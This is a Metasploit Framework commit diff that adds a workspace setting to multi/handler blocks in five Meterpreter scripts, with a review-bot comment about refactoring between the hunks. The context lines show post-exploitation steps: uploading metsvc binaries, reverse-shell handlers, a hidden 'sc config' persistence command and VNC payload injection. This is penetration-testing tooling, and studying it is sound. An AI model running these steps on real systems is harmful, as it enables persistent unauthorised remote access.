
Propogate the workspace down to multi-handlers

git-svn-id: file:///home/svn/framework3/trunk@8734 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2010-03-07 22:49:08 +00:00
parent a0d5ce473b
commit aebedfdb2d
5 changed files with 29 additions and 13 deletions


@ -22,7 +22,7 @@ def m_exec(session, cmd)
while(d = r.channel.read)
b << d
end
r.channel.close
r.channel.close
r.close
b
end
@ -49,7 +49,7 @@ opts.parse(args) do |opt, idx, val|
when "-A"
autoconn = true
when "-r"
remove = true
remove = true
end
end
@ -74,7 +74,7 @@ client.fs.dir.mkdir(tempdir)
%W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
next if (bin != "metsvc.exe" and remove)
print_status(" >> Uploading #{bin}...")
print_status(" >> Uploading #{bin}...")
fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
fd.close
@ -105,14 +105,14 @@ end
if(autoconn)
print_status("Trying to connect to the Meterpreter service at #{client.tunnel_peer.split(':')[0]}:#{rport}...")
mul = client.framework.exploits.create("multi/handler")
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
mul.datastore['LPORT'] = rport
mul.datastore['RHOST'] = client.tunnel_peer.split(':')[0]
mul.datastore['ExitOnSession'] = false
mul.datastore['ExitOnSession'] = false
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true
)
end
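Review bot: The handler setup at `mul = client.framework.exploits.create("multi/handler")` followed by the new `mul.datastore['WORKSPACE'] = client.workspace` is now hand-copied into all five scripts in this commit, and the commit exists precisely because one datastore key was missing from every copy; a small shared helper that creates the handler and tags it with the session's workspace, e.g. `client.framework.exploits.create("multi/handler").tap { |h| h.datastore['WORKSPACE'] = client.workspace }`, would keep the next key from being forgotten in four of five places, and the same applies to the handler blocks in the other four file sections. If `client.workspace` can be nil for sessions created without a database, the new line stores nil in the datastore rather than leaving the handler's default, so it is worth confirming the handler treats a nil value as "default workspace". The first three hunks of this file show each changed line printed identically twice, which suggests whitespace-only changes mixed into a functional commit; separating them would make the review easier.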


@ -87,6 +87,7 @@ print_status("Agent executed with PID #{proc.pid}")
#
if(autoconn)
mul = client.framework.exploits.create("multi/handler")
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
mul.datastore['LHOST'] = rhost
mul.datastore['LPORT'] = rport


@ -1,6 +1,6 @@
# $Id$
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
@ -83,9 +83,10 @@ client.sys.process.get_processes().each do |m|
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['WORKSPACE'] = client.workspace
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
@ -94,6 +95,7 @@ client.sys.process.get_processes().each do |m|
)
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'})
end
end


@ -104,6 +104,7 @@ client.sys.process.get_processes().each do |m|
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['WORKSPACE'] = client.workspace
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
@ -119,3 +120,4 @@ client.sys.process.get_processes().each do |m|
end
end


@ -16,6 +16,7 @@ opts = Rex::Parser::Arguments.new(
"-i" => [ false, "Inject the vnc server into a new process's memory instead of building an exe"],
"-P" => [ true, "Executable to inject into (starts a new process). Only useful with -i (default: notepad.exe)"],
"-D" => [ false, "Disable the automatic multi/handler (use with -r to accept on another system)"],
"-O" => [ false, "Disable binding the VNC proxy to localhost (open it to the network)"],
"-V" => [ false, "Disable the automatic launch of the VNC client"],
"-t" => [ false, "Tunnel through the current session connection. (Will be slower)"],
"-c" => [ false, "Enable the VNC courtesy shell"]
@ -32,10 +33,12 @@ lhost = "127.0.0.1"
autoconn = true
autovnc = true
anyaddr = false
courtesy = false
tunnel = false
inject = false
runme = "notepad.exe"
pay = nil
#
# Option parsing
@ -53,6 +56,8 @@ opts.parse(args) do |opt, idx, val|
runme = val
when "-D"
autoconn = false
when "-O"
anyaddr = true
when "-V"
autovnc = false
when "-c"
@ -85,17 +90,23 @@ else
pay.datastore['LPORT'] = rport
end
if (not courtesy)
pay.datastore['DisableCourtesyShell'] = true
end
if (anyaddr)
pay.datastore['VNCHOST'] = "0.0.0.0"
end
if autoconn
mul = client.framework.exploits.create("multi/handler")
mul.share_datastore(pay.datastore)
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = payload
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
mul.datastore['WfsDelay'] = 7
if (not courtesy)
mul.datastore['DisableCourtesyShell'] = true
end
mul.datastore['AUTOVNC'] = autovnc